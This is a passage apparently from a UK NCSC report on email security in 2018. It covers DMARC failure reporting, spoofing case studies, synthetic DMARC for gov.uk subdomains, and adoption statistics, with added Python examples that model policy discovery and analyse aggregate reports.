In addition to the DMARC aggregate reports which provide statistics about emails received, and how they are processed, the DMARC standard defines ‘Failure Reports’, also known as ‘Forensic Reports’. These reports are intended to show domain owners what the email that failed authentication (and so was potentially spoofed) looked like by including a copy of the full email. In order to address privacy concerns, particularly around reporting of legitimate emails due to misconfiguration, the standards allow for redaction in the reports. The level of redaction is left to email service providers to decide on, and has always varied. In our experience, this has ranged from some providers who include only partial header information, through to some providing weakly redacted complete emails along with attachments.

In the first half of 2018 we noticed a drop off in the failure reporting received by our Mail Check tool, and so investigated what we were currently receiving. The results showed a dramatic drop in the volume of failure reports, and increased redaction, reducing the usefulness of what we were getting. The majority of reports were coming from a non-email service provider, we believe because of an odd email loop. Of the remainder, all reports included only headers, and were received from a set of foreign receivers that were not representative of the UK email market we’d expect Mail Check users to be interacting with. After some research and consultation, it appears that amongst other things, concerns about the privacy impact of even redacted emails alongside the introduction of GDPR have put a real dampener on failure reporting. Given the very limited, non-representative data we’ve been receiving, along with the potential to be dealing with very sensitive private data in uncommon edge cases, we’ve stopped collecting and processing DMARC failure reports. We have told Mail Check users to no longer add the failure reporting address to their DMARC record and to remove it when convenient.

We continue to be interested in DMARC failure reports, and other opportunities for automated information sharing to both improve configuration and identify and mitigate attacks. We’ll continue to consult with the email security community and Mail Check users about opportunities in this area.

[9] To be completely clear, finding an interestingly-titled email in their spam folder, trying to open the attached Excel spreadsheet, failing, moving the message back to the inbox, opening the Excel spreadsheet for real and clicking through not one, not two, but three different security warnings. So, we’d like p = reject to mean p = reject. We get there’s a balance though.


3.5 Abuse of public sector email domains

3.5.1 Spooftastic data

This is where we’d normally report a huge swathe of really interesting data about how the UK public sector’s email domains have been abused over the last year. Unfortunately, due to the Microsoft decision in 2017, the data wouldn’t be consistent with last year. No matter how many disclaimers we put in this paper, someone would compare the numbers we could publish this year with the ones we published last year and make claims that just wouldn’t be substantiated by the biased data we have. Rather than continue to explain why that’s not good science, we’ve decided not to publish the macro-level data. Instead, we’ve drawn some other conclusions that will hopefully be as interesting and lead to other avenues of research. For those cynics among you, this isn’t some excuse because the data suggests things have got worse. That’s not the case - we’re doing this for the right reasons.

3.5.2 Case study: Campaign using real domain

Criminals aren’t always consistent in how they use spoofed brands or the care they take in targeting specific campaigns. Here, we show an example of a non-departmental public body whose email domain is hardly spoofed at all during the year, followed by a massive spike in December. Figure 17 shows the volume of spoofed messages across the year. You’ll note there are no reported dispositions of reject at all across the year.

It’s interesting to look at the reporters of these spoofed messages. The top reporter of disposition quarantine mail (remember, we had no reject disposition in this campaign) was the Russian email provider mail.ru with over two million reports (2,125,701 to be exact). The next two most prolific reporters were Google with 1,430 reports and Yahoo! with 327. This could show a certain lack of targeting from the criminal behind this campaign. We can’t say that it was totally incorrectly targeted as we get no reports from Microsoft, one of the bigger providers of email services to UK citizens, but given the numbers from Google and Yahoo!, it’s pretty likely this was a criminal targeting Russian citizens using a slightly obscure UK public sector body as the lure. This does seem to suggest that not all criminals are omnipotent evil geniuses.

3.6 Synthetic DMARC

An email apparently from the government looks much more legitimate if it comes from a gov.uk domain such as taxrefund.gov.uk than from a domain not linked to the government like taxrefund.gov.uk.hmrc.secure.clearlyshady.net. Attackers have traditionally exploited this trust imbalance to make their phishing emails look more legitimate. Last year, we talked about some initial work on ‘synthetic DMARC’, that is synthesising DMARC and related DNS records for non-existent subdomains. We have since done some more work on the technique and in July we moved the policy to p = reject without causing any damage. Be clear though: this remains an evil hacky kludge and we need a better way to express policy ownership in domain hierarchies. gov.uk is an example of something called a ‘Public Suffix Domain’, as we talked about in the last report. Since then the IETF DMARC Working Group has started to discuss the various issues and begin to write RFCs that could help solve this problem. We welcome this work and will support it as it will help governments and other owners of Public Suffix Domains better implement DMARC policies and make criminals’ lives harder. As new generic top level domains like .bank come online at scale, this will be even more important.
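The Python below models the policy discovery a receiver performs (RFC 7489 section 6.6.3) and shows why a Public Suffix Domain such as gov.uk cannot cover a non-existent subdomain by itself, and how a synthesised record changes the outcome. It is an added example, not the NCSC’s implementation (the report does not describe the mechanism it uses): the wildcard-based zone, the mini public suffix list, the rua address and the hmrc.gov.uk record are all constructed for the illustration. The `disposition` function also covers the none / quarantine / reject semantics discussed in sections 3.3 and 3.7.

```python
# Constructed mini public suffix list. gov.uk is on the real PSL, which is the root
# of the problem: the organisational domain of anything.gov.uk is anything.gov.uk.
PUBLIC_SUFFIXES = {"uk", "co.uk", "gov.uk", "com"}


def organisational_domain(domain):
    """Public-suffix-plus-one, as DMARC's organisational domain step requires."""
    labels = domain.lower().strip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:]) if i > 0 else None
    return ".".join(labels[-2:])


def parse_dmarc(txt):
    """Tag dict for a 'v=DMARC1' TXT string, or None for anything else (e.g. an SPF record)."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else None


def lookup_txt(zone, qname):
    """Simulated authoritative TXT lookup with RFC 4592 wildcard semantics: '*.X' answers
    only when X is the closest existing ancestor of qname (no closer node exists)."""
    if qname in zone:
        return zone[qname]
    nodes = set()
    for name in zone:                        # every name plus its ancestors is a node
        labels = name.split(".")
        nodes.update(".".join(labels[i:]) for i in range(len(labels)))
    labels = qname.split(".")
    for i in range(1, len(labels)):
        ancestor = ".".join(labels[i:])
        if ancestor in nodes:                # closest encloser found
            return zone.get("*." + ancestor, [])
    return []


def first_dmarc(records):
    for txt in records:
        rec = parse_dmarc(txt)
        if rec:
            return rec
    return None


def discover_policy(zone, from_domain):
    """RFC 7489 policy discovery -> (policy, domain the policy came from, how it was found)."""
    rec = first_dmarc(lookup_txt(zone, "_dmarc." + from_domain))
    if rec:
        return rec.get("p"), from_domain, "from-domain"
    org = organisational_domain(from_domain)
    if org and org != from_domain:
        rec = first_dmarc(lookup_txt(zone, "_dmarc." + org))
        if rec:
            return rec.get("sp", rec.get("p")), org, "org-domain"
    return None, None, "none"


def disposition(policy, spf_aligned_pass, dkim_aligned_pass):
    """What a conforming receiver should do given the aligned SPF/DKIM results."""
    if spf_aligned_pass or dkim_aligned_pass:
        return "deliver"                     # DMARC passes; the policy is not consulted
    return {"quarantine": "quarantine", "reject": "reject"}.get(policy, "deliver")


# Constructed zones. The rua address and the wildcard mechanism are assumptions for the example.
ZONE_PLAIN = {
    "_dmarc.hmrc.gov.uk": ["v=DMARC1; p=reject; sp=quarantine; rua=mailto:dmarc-reports@example.org"],
}
ZONE_SYNTHETIC = dict(ZONE_PLAIN)
ZONE_SYNTHETIC["*.gov.uk"] = [
    "v=spf1 -all",                                              # SPF answer for the bogus subdomain
    "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.org",  # answer for _dmarc.<bogus>.gov.uk
]

if __name__ == "__main__":
    for zone_name, zone in [("plain", ZONE_PLAIN), ("synthetic", ZONE_SYNTHETIC)]:
        for sender in ["taxrefund.gov.uk", "hmrc.gov.uk", "payroll.hmrc.gov.uk"]:
            policy, origin, how = discover_policy(zone, sender)
            print(zone_name, sender, policy, origin, how, disposition(policy, False, False))
```

Two things the model makes visible: first, without the synthesised record a spoofed taxrefund.gov.uk has no policy at all, because its organisational domain is itself and gov.uk’s own record is never consulted; second, the wildcard stops answering the moment a real node such as hmrc.gov.uk exists beneath gov.uk, so a non-existent payroll.hmrc.gov.uk is governed by hmrc.gov.uk’s sp= tag, as the standard intends. A wildcard also makes the bogus name answer NODATA rather than NXDOMAIN for A and MX queries, which bears on the guess in section 3.6.5 about receivers that fail delivery early on a non-existent From domain.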

Table 11 and Figure 18 show the volume of DMARC aggregate reports sent as a result of synthetic DMARC records.


[Figure 17 chart: volume of spoofed email per month; x-axis Month (2018), January to December; y-axis Volume of spoofed email, 0 to 2,200,000; series: Quarantine, None.]

Figure 17: Volume of spoofed email using one particular public sector domain

3.6.1 Case study: Spoofing the aviation sector

Figure 19 shows the number of emails blocked each day by synthetic DMARC records over four months in 2018. In total, 429,908 emails were blocked over this period, but around 15% of this number were blocked on one day, 8 August.

This large spike in emails blocked by synthetic DMARC was due almost entirely to one particular email spoofing campaign. The emails appeared to come from a gov.uk domain purporting to belong to an organisation in the aviation sector. No such gov.uk domain is registered - and the entity involved wouldn’t qualify for a subdomain under gov.uk - so we knew the emails were suspicious. Figure 20 shows that the campaign began with a very high number of emails which dropped to a low level within a few days.

Once this was detected, we looked across our services to see where this domain had been detected. The takedown service identified the domain in use in advance fee fraud emails in its spam feed. The email host of the account was notified that it was being used in fraudulent activity, and it was taken down. This shows how useful the sharing of data between services can be, and it’s something we’re aiming to develop and expand in 2019 as the Threat-o-matic[10] moves towards production status.

Month (2018)   Total Reports Received
July                            5,764
August                        274,532
September                     127,901
October                        17,553
November                       17,191
December                      105,078

Table 11: Volume of synthetic DMARC reports

[Figure 18 chart: bars of synthetic DMARC reports per month; x-axis Month (2018), July to December; y-axis No of synthetic DMARC reports received, 0 to 250,000.]

Figure 18: Volume of synthetic DMARC reports received

3.6.2 Case study: Merger of two public bodies

In 2016, two fire services merged to form a new super service with a new name and associated internet domain. One of the constituent organisations subsequently deregistered their original domain. Between July and September 2018, synthetic DMARC blocked more than 150,000 emails from this now non-existent domain. We can’t be 100% sure whether these were as a

[10] OK, Streaming Event Platform


[Figure 19 chart: emails blocked per day; x-axis Aug-18 to Nov-18; y-axis Volume of spoofed mail, 0 to 60,000.]

Figure 19: Volume of email blocked by synthetic DMARC records

result of fraudulent purposes or misconfiguration, but it’s an interesting artefact that shows the necessity to correctly curate domains throughout their lifecycle.

3.6.3 Investigating failing mail

One of the things we’ve looked for is email that could be legitimate, but is failing DMARC tests, ignoring the final disposition of the mail. We further filter to include only those entries where the reverse DNS of the sending IP was not NXDOMAIN and was not contained in the gov.uk top level domain (TLD). We seem to find three different classes of email like this :

1. Things that are clearly malicious. The aviation sector example is one where the domain doesn’t exist, but there are others like mail from bedfordhire.gov.uk (note the misspelling) being sent from a domestic broadband connection in China.

2. Things that are clearly misconfigurations. For example, many public sector bodies still use the MessageLabs service, but many seem not to have included that infrastructure in their SPF records.

3. All the other weird stuff.

The weird stuff is exactly that - weird - and in the vast majority of cases each instance relates to a tiny number of email messages. Some of it could be legitimate uses of niche services, or


[Figure 20 chart: emails per day; x-axis 07-Aug-18 to 04-Sep-18; y-axis Volume of spoofed mail, 0 to 60,000.]

Figure 20: Volume of emails related to aviation related campaign

test infrastructure that departments are experimenting with. Some of it could be really targeted malicious use of the domain. Without a lot more investigation, it’s really difficult to tell. We’re hoping that some of the results alluded to in section 3.9 will give us tools to cut down to really interesting cases more quickly.
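As an added example of the filter described in this section (not Mail Check’s code), the Python below parses a DMARC aggregate report, keeps the rows whose mail passed neither aligned DKIM nor aligned SPF regardless of the disposition applied, and drops rows whose sending IP has no reverse DNS or resolves under gov.uk. The report XML, the IP addresses (documentation ranges) and the reverse DNS answers are constructed; a real pipeline does live PTR lookups, and because reports arrive from arbitrary senders it should parse them with defusedxml rather than the stdlib ElementTree used here. The same parser gives the per-IP volume that section 3.9 ranks.

```python
import xml.etree.ElementTree as ET   # use defusedxml for reports from untrusted senders

# Constructed DMARC aggregate (rua) report; domains and report_id are placeholders.
SAMPLE_REPORT = """<?xml version="1.0"?>
<feedback>
  <report_metadata>
    <org_name>receiver.example</org_name>
    <report_id>constructed-0001</report_id>
    <date_range><begin>1533600000</begin><end>1533686400</end></date_range>
  </report_metadata>
  <policy_published><domain>body.gov.uk</domain><p>quarantine</p><sp>quarantine</sp></policy_published>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>120</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated></row>
    <identifiers><header_from>body.gov.uk</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>198.51.100.7</source_ip><count>3</count>
      <policy_evaluated><disposition>quarantine</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>body.gov.uk</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>203.0.113.55</source_ip><count>1500</count>
      <policy_evaluated><disposition>quarantine</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>body.gov.uk</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>203.0.113.99</source_ip><count>2</count>
      <policy_evaluated><disposition>quarantine</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>body.gov.uk</header_from></identifiers>
  </record>
  <record>
    <row><source_ip>198.51.100.200</source_ip><count>5</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>body.gov.uk</header_from></identifiers>
  </record>
</feedback>
"""

# Constructed reverse DNS answers; a missing key models NXDOMAIN (203.0.113.99 here).
RDNS = {
    "192.0.2.10": "mail.body.gov.uk",
    "198.51.100.7": "outbound.filtering-provider.example",  # relay missing from SPF: misconfiguration
    "203.0.113.55": "dyn-55.broadband-isp.example",         # consumer line sending 1,500 messages
    "198.51.100.200": "relay.other-body.gov.uk",            # under gov.uk, so excluded by the filter
}


def parse_records(xml_text):
    """Yield one flat dict per <record> in an aggregate report."""
    root = ET.fromstring(xml_text)
    for rec in root.findall("record"):
        ev = rec.find("row/policy_evaluated")
        yield {
            "ip": rec.findtext("row/source_ip"),
            "count": int(rec.findtext("row/count")),
            "dkim": ev.findtext("dkim"),
            "spf": ev.findtext("spf"),
            "disposition": ev.findtext("disposition"),
            "header_from": rec.findtext("identifiers/header_from"),
        }


def volume_by_ip(xml_text):
    """Messages per sending IP, the input to a rank-by-volume table."""
    totals = {}
    for r in parse_records(xml_text):
        totals[r["ip"]] = totals.get(r["ip"], 0) + r["count"]
    return totals


def failing_candidates(xml_text, rdns):
    """Rows that failed DMARC (neither aligned DKIM nor aligned SPF passed), ignoring the
    disposition, whose sending IP has a PTR record that is not under gov.uk. Sorted by volume."""
    out = []
    for r in parse_records(xml_text):
        if r["dkim"] == "pass" or r["spf"] == "pass":
            continue                                   # DMARC passed; not of interest here
        ptr = rdns.get(r["ip"])
        if ptr is None:                                # NXDOMAIN
            continue
        if ptr.lower() == "gov.uk" or ptr.lower().endswith(".gov.uk"):
            continue
        out.append({**r, "rdns": ptr})
    return sorted(out, key=lambda r: -r["count"])


if __name__ == "__main__":
    for c in failing_candidates(SAMPLE_REPORT, RDNS):
        print(c["count"], c["ip"], c["rdns"], c["header_from"], c["disposition"])
```

Of the five constructed rows, only two survive the filter: the high-volume consumer connection (the shape of the report’s class 1) and the low-volume filtering relay (class 2). Deciding which class a survivor belongs to still needs the analyst; the filter only removes the rows that cannot be interesting.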

3.6.4 Spoofing from non-UK IP addresses

At least 49% of emails blocked by synthetic DMARC between 10 July and 7 November 2018 came from IP addresses that reverse DNS showed were associated with non-UK country code top-level domains (ccTLDs). This proportion does not include non-geographic top-level domains such as .com and .net. Emails were blocked from 69 different ccTLDs. Given the research results in section 3.9, we’re not actually sure what this tells us. More work is needed in this area.

3.6.5 Synthetic DMARC not universal

As mentioned previously, our synthetic DMARC idea is an evil kludge. In Table 12 we show the total number of DMARC reports received from the top 5 providers and in Table 13 the total number of synthetic DMARC reports received in one month. If we assume that spoofed email is broadly uniformly distributed across receivers, we would expect the top five reporters of both real and synthetic DMARC reports to be broadly the same, which they are not. Therefore, we can infer that not all receivers of email correctly process synthetic DMARC records. While we can only guess at why (perhaps they fail delivery early when the From address domain is NXDOMAIN, before ever looking up a DMARC record), this gives more weight to the current work in the IETF DMARC working group on handling Public


Reporter            Total Reports
google.com             61,363,605
Yahoo! Inc.            18,876,201
Mail.Ru                   699,554
sercoglobal.com           227,587
AMAZON-SES                178,262

Table 12: Top five DMARC reporters in January 2019

Reporter               Total Reports
google.com                    23,745
Yahoo! Inc.                    1,060
emailsrvr.com                     64
dev.johnlewis.co.uk               37
bridgend.gov.uk                   30

Table 13: Top five synthetic DMARC reporters in January 2019

Suffix Domains in a more standardised way.

3.7 The journey to reject

For any enterprise of a decent size, implementing DMARC is often a long process. An organisation usually starts the process by implementing a policy of p = none. This will not affect how the mail is handled, but the reports will let the organisation see which mail would pass DMARC checks and which would fail. This helps an organisation better understand the reality of their mail infrastructure before making anything service-affecting. Next is p = quarantine, where the DMARC policy tells the receiver to ‘quarantine’ any mail that doesn’t pass the checks and this normally results in mail going into the user’s spam folder. Finally, organisations move to a policy of p = reject, which mostly (but not always) sees the spoofed mail never even reaching the intended recipient.

If the underlying understanding of the mail infrastructure isn’t complete, implementing DMARC can cause non-delivery of real mail. That’s bad, so the process of turning on the more stringent policies should be done carefully. Factor in expertise and resources, and you can end up with a wide distribution of how long a domain takes to get to p = reject. This is despite some organisations trying to force people to get their DMARC records to p = reject in 90 days.

Figure 21 shows a histogram of the time taken for domains joining Mail Check to get to a policy of p = reject. Some domains started sending their reports to Mail Check with p = reject already implemented, which we exclude from this. The longest it took any organisation to reach p = reject was 542 days.

As we’ve said, DMARC needs to be implemented carefully. There may be extenuating circumstances that lead to some of the really long implementation times, but in general we’d like to speed up the implementation timeline and will be looking at what else we can do to support organisations on this journey. As we de-risk and optimise DMARC adoption using public sector as a proving ground, we’ll publish the learnings and tooling we create in order to help others with their implementation.


[Figure 21 chart: histogram; x-axis Time to reach p=reject in days, 0 to 600; y-axis No of domains, 0 to 50.]

Figure 21: Histogram of time for domains to get to p = reject (bin width=7 days, xmax = 550).

3.8 Is there a link between DMARC and phishing?

Implementing DMARC should make it harder for criminals to spoof high-trust domains as part of their phishing campaigns. This should disincentivise a set of criminals from using gov.uk as a brand lure for their campaigns because the lures are less attractive to potential victims. We note that we’ve seen very few deceptive domains[11] related to gov.uk in 2018, and so any change in posture is likely to be reflected in spoofing. So, it would be informative to consider the effect of DMARC on public sector domains with p = quarantine or p = reject policies (i.e. those that are likely to cause a potential victim to not see a message) and the volume of public sector related phishing entities that we have taken down over the same period. Figure 22 shows these data.

By observation, it appears that higher DMARC adoption across a set of brands is (weakly) negatively correlated with the volume of takedowns impersonating those brands. We haven’t looked at the specific adoption of DMARC by individual sub-brands of HMG and the effect on phishing yet, but should do so. However, we’re prioritising the adoption of DMARC and the Takedown Service across the same set of high-trust, value-bearing brands, so the populations should be broadly similar. The trend line is pretty noisy, but seems to be broadly downward, apart from the large spike in September which is explained in section 2.3.1. However, there are many variables we could control and correct for in this, including our own work on proactive takedowns for the same brands. So, we absolutely cannot say that the link is causal (i.e. more DMARC means less phishing) but we can suggest that the combination of measures seems to be having a protective effect. We’ll try to do some more detailed analysis next year.

[Figure 22 plot: x axis months Jan-18 to Dec-18; y axis ‘Number of domains or takedowns’ (0 to 500); series ‘DMARC adoption’ and ‘Phishing takedowns’]

Figure 22: Relationship between DMARC adoption and phishing attacks for public sector

[11] Recall from last year’s report, a deceptive domain is constructed specifically to try to fool a user into believing it’s a real domain. An example would be taxrefund.secure.hmrc.gov.uk.cf.

3.9 Other research

We’ve partnered with the Alan Turing Institute, the UK’s national institute for data science and artificial intelligence, allowing them access to our Mail Check data to drive innovative research in this area. The initial work intends to test a number of simple heuristic and clustering approaches on DMARC aggregate data to discover likely misconfigurations and malicious activity. The initial work has shown some simple heuristics are relatively powerful in the administration and understanding of DMARC at large scale. We have also discovered some very interesting features of the gov.uk email estate. The full findings of the work are too long to be included in totality here, but we provide some example findings.

For example, across all the aggregate reports received by the Mail Check platform, mail has been sent from some 4.9 million IP addresses. Table 14 shows a ranked table of the volume of email sent by each IP address over the two years of data collected by Mail Check. ‘Rank’ is the IP’s rank by volume sent and ‘passing’ has the definition in the DMARC standard - i.e. either the SPF or DKIM tests pass.

It is interesting that over 90% of all email from gov.uk subdomains [12] is sent from 5000 IP addresses and that the 5000th most voluminous sender of email sent less than 7000 emails over those two years. This implies a very long tail to account for the 4.9 million sending IPs in the Mail Check data set and also suggests that the problem of discovering misconfiguration and malicious activity across the gov.uk sending estate should be split into two distinct problems: that of the relatively small number of high volume senders and that of the relatively large number of low volume senders.
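To make the ‘passing’ definition and the ranked, cumulative layout of Table 14 concrete, here is an added example (not Mail Check’s or the Turing Institute’s code) that builds such a table from aggregate-report XML. It assumes the standard RUA report layout from RFC 7489; the two reports, their domain and their IP addresses are constructed sample data.

```python
"""Ranking sending IPs from DMARC aggregate (RUA) reports.

Added example, not Mail Check's code. It parses aggregate-report XML in the
RFC 7489 layout, totals messages per source IP, applies the DMARC 'passing'
definition used on this page (SPF pass OR DKIM pass in policy_evaluated) and
produces the cumulative shares of a ranked sender list, as in Table 14.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

SAMPLE_REPORTS = [  # constructed sample data for a hypothetical domain
    """<feedback>
  <report_metadata><org_name>receiver-a.example</org_name></report_metadata>
  <policy_published><domain>example.gov.uk</domain><p>reject</p></policy_published>
  <record><row><source_ip>192.0.2.10</source_ip><count>500</count>
    <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf>
    </policy_evaluated></row></record>
  <record><row><source_ip>192.0.2.20</source_ip><count>300</count>
    <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>pass</spf>
    </policy_evaluated></row></record>
  <record><row><source_ip>198.51.100.7</source_ip><count>150</count>
    <policy_evaluated><disposition>reject</disposition><dkim>fail</dkim><spf>fail</spf>
    </policy_evaluated></row></record>
</feedback>""",
    """<feedback>
  <report_metadata><org_name>receiver-b.example</org_name></report_metadata>
  <policy_published><domain>example.gov.uk</domain><p>reject</p></policy_published>
  <record><row><source_ip>192.0.2.10</source_ip><count>40</count>
    <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>fail</spf>
    </policy_evaluated></row></record>
  <record><row><source_ip>203.0.113.9</source_ip><count>10</count>
    <policy_evaluated><disposition>reject</disposition><dkim>fail</dkim><spf>fail</spf>
    </policy_evaluated></row></record>
</feedback>""",
]


def parse_report(xml_text):
    """Yield (source_ip, count, passing) for each <row> of one aggregate report."""
    root = ET.fromstring(xml_text)
    for row in root.iter("row"):
        ip = row.findtext("source_ip")
        count = int(row.findtext("count"))
        evaluated = row.find("policy_evaluated")
        # DMARC passes when either aligned identifier (DKIM or SPF) passes.
        passing = (evaluated.findtext("dkim") == "pass"
                   or evaluated.findtext("spf") == "pass")
        yield ip, count, passing


def aggregate(reports):
    """Per-IP totals across all reports: {ip: {"sent", "passing", "failing"}}."""
    totals = defaultdict(lambda: {"sent": 0, "passing": 0, "failing": 0})
    for xml_text in reports:
        for ip, count, passing in parse_report(xml_text):
            totals[ip]["sent"] += count
            totals[ip]["passing" if passing else "failing"] += count
    return dict(totals)


def ranked_table(totals):
    """Rank IPs by volume and add cumulative shares of all sent/passing/failing mail."""
    all_sent = sum(t["sent"] for t in totals.values())
    all_pass = sum(t["passing"] for t in totals.values())
    all_fail = sum(t["failing"] for t in totals.values())
    ranked = sorted(totals.items(), key=lambda kv: kv[1]["sent"], reverse=True)
    rows, cum_sent, cum_pass, cum_fail = [], 0, 0, 0
    for rank, (ip, t) in enumerate(ranked, start=1):
        cum_sent += t["sent"]
        cum_pass += t["passing"]
        cum_fail += t["failing"]
        rows.append({
            "rank": rank, "ip": ip, "sent": t["sent"],
            "cum_sent_pct": round(100 * cum_sent / all_sent, 2),
            "cum_pass_pct": round(100 * cum_pass / all_pass, 2) if all_pass else 0.0,
            "cum_fail_pct": round(100 * cum_fail / all_fail, 2) if all_fail else 0.0,
        })
    return rows


def senders_for_share(rows, pct):
    """Smallest rank whose cumulative share of all mail reaches `pct` percent
    (the '90% of mail from 5000 IPs' kind of statement)."""
    for r in rows:
        if r["cum_sent_pct"] >= pct:
            return r["rank"]
    return None


if __name__ == "__main__":
    for r in ranked_table(aggregate(SAMPLE_REPORTS)):
        print(r)
```

On the constructed reports the top sender accounts for 54% of all mail and 100% of passing mail is reached at rank 2, which is the shape Table 14 shows at scale: a short head of high volume, mostly passing senders and a long tail that carries most of the failures.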

For an initial clustering of high volume senders, the researchers took the top 10,000 sending IP addresses (by volume) and built a feature vector containing both IP address related features and domain related features. These were built into a sparse matrix and their dimensionality reduced to 100 dimensions using truncated singular value decomposition (truncated SVD). The resulting features were clustered using density-based spatial clustering of applications with noise (DBSCAN), requiring at least three neighbours for clustering. The resulting clusters are visualised using t-distributed stochastic neighbour embedding (t-SNE) and shown in figure 23. Due to the large number of clusters, colours are difficult to distinguish, but clusters of similar colour that are not spatially proximate are independent on this visualisation. The figure shows 273 distinct clusters with unclustered points in grey. One of the interesting results of this work is that a ‘super component’ exists that links otherwise unrelated clusters and this contains 1879 distinct IP addresses. There are a further 4 clusters each containing 512 addresses. Manual inspection shows these to be common infrastructure, including large cloud providers. This simple result hints at the potential benefit of structured analysis of DMARC aggregate reporting for discovering both misconfiguration and malicious abuse of a domain.

[12] Specifically, those gov.uk subdomains that report to Mail Check or for which Synthetic DMARC records are generated.

Rank      % all emails sent   % all passing emails   % all failing emails   No. of sent mails
          (cumulative)        (cumulative)           (cumulative)           (this IP)
1         7.53%               8.78%                  5.45%                  82,656,664
5         24.83%              31.50%                 13.71%                 21,795,746
10        32.46%              43.60%                 13.87%                 8,559,220
50        45.51%              57.53%                 25.47%                 3,007,656
100       55.94%              63.54%                 43.27%                 1,895,731
500       77.85%              86.05%                 64.17%                 183,026
1,000     83.37%              91.74%                 69.41%                 71,285
2,000     87.00%              95.59%                 72.68%                 22,628
5,000     90.29%              98.48%                 76.64%                 6,865
10,000    92.14%              99.22%                 80.34%                 2,576
20,000    93.57%              99.50%                 83.68%                 1,008
50,000    95.14%              99.78%                 87.40%                 340
100,000   96.16%              99.86%                 89.98%                 155

Table 14: Distribution of IP addresses sending email and their disposition

This research should lead to new ways of automatically analysing DMARC aggregate reports to alert domain owners to misconfigurations or spoof messages using their domain.

3.10 Conclusion

Adopting DMARC at scale is one of the key planks of the NCSC’s ACD programme. Despite being unable to publish comparative data for the year 2018 (due to Microsoft’s change in policy), we believe that adoption of DMARC at scale is a key capability to degrade criminals’ attempts to abuse trusted brands. However, there remain some issues that need to be resolved:

• A centralised processing platform and experienced people who understand what reports imply is a significant benefit to adoption.

• Expert, structured analysis of the aggregate data looks like a promising avenue of sustained research.

• Misconfigurations remain an issue.

• Criminal modus operandi evolves as protections are put in place, making curating email security, including DMARC, a long-term effort for any organisation.

• Implementing DMARC at scale at the Public Suffix Domain level is currently fraught. This makes the IETF DMARC Working Group efforts in this area even more important if we are to encourage more widespread adoption of DMARC.

• Receivers are weird. It would be nice if they could be both self-consistent and consistent across the community.


Figure 23: t-SNE visualisation of clustering of high volume IP address features


We believe that we’ve shown that DMARC adoption and the resulting action from the reports generated is worth the effort. We strongly encourage all UK businesses that have high-trust brands with the UK population to adopt DMARC to remove one avenue for criminals to monetize their brands. We also strongly encourage other governments to begin to centrally curate their own domains. It is only through widespread adoption of better email security that we will have a sustained impact on criminal return on investment and their intent to attack citizens.

Internal to NCSC, we have a league table of progress of adoption of DMARC. We may seek to publish this, and one which does the same for certain industry sectors, over the coming year. After all, all the data necessary to build such tables are in the public domain.


4 Domain Discovery

Last year, we described Domain Discovery, a service that is intended to help an organisation understand the totality of its internet domain footprint. Then, we said that the service was in private alpha. It’s now slowly being turned into a real service with a minimum viable product (MVP) to be delivered in Spring 2019 [13].

The MVP uses data from a commercial Whois service, that provides details of domain registrations, although these are often inconsistently populated and incomplete, particularly for the kinds of small public sector organisations that could most benefit from the Domain Discovery service. So the Whois data is combined with the output from a new algorithm from the Alan Turing Institute that attempts to find possibly-owned domains for an organisation by following all hyperlinks throughout the organisation’s website, intelligently analysing the content of the destination websites using state-of-the-art topic models, and then continuing to follow links from those new sites. This can be done at scale using open-source web crawl data from the Common Crawl project [14]. The results so far are promising but more work is needed to tune the algorithm, and to tidy up and expand the results.

The Domain Discovery service intends to help organisations tackle the various hard parts of having domains on the internet (that is discovery, verification of ownership and dangling DNS). As mentioned, the service is not yet fully functional and so providing a detailed summary of the output isn’t yet possible. However, we can illustrate by looking at the results from ncsc.gov.uk. Commercial and third party tools like Hardenize, DNSDumpster and Sublist3r tell us that there are over 100 subdomains of ncsc.gov.uk. Domain Discovery currently presents a further 125 ‘domains of interest’, that is not subdomains, but sites that look like they might be owned by NCSC, such as govcertuk.gov.uk and even gchq.gov.uk. Some of the results are rather tenuous but are presented to the user in a way to make that obvious, using High, Medium and Low confidence bands, and a description of what the confidence bands mean. We’re currently evaluating the results with a select group of customers (mostly local government organisations) in order to gather feedback on the usefulness of the service, and what additional data, analytics and filtering rules we might want to include.

The next phase of development, scheduled for the second half of 2019, will likely expand the service’s data sources to include more commercial services, more NCSC-produced data, and more public data like DNS records and certificate transparency logs. We also want to rebuild the API set to make the whole thing integrate better with the wider Active Cyber Defence service portfolio.

On a related note, to encourage new research ideas in this space, we posed the wider challenge of automatically capturing the purpose of websites to the academic community through a ‘Data Study Group’ run by the Alan Turing Institute in December 2018. A number of ideas were tried, especially for combining clues from hyperlinks and content in smart ways, and the report is available on the institute’s website [15].

[13] Remember, this paper covers the calendar year 2018!
[14] http://commoncrawl.org
[15] https://www.turing.ac.uk/collaborate-turing/data-study-groups

5 Web Check

Web Check is a service for public sector organisations to check and maintain the security of their web infrastructure. It scans their websites for the most common vulnerabilities and the results of the scan are then presented to them in the Web Check tool, alongside advice on how to mitigate any vulnerabilities. Web Check is mainly about getting public sector organisations used to being proactively scanned and fixing issues as we move to a ‘scan by default’ posture for anything with a gov.uk name.

5.1 Last year in Web Check

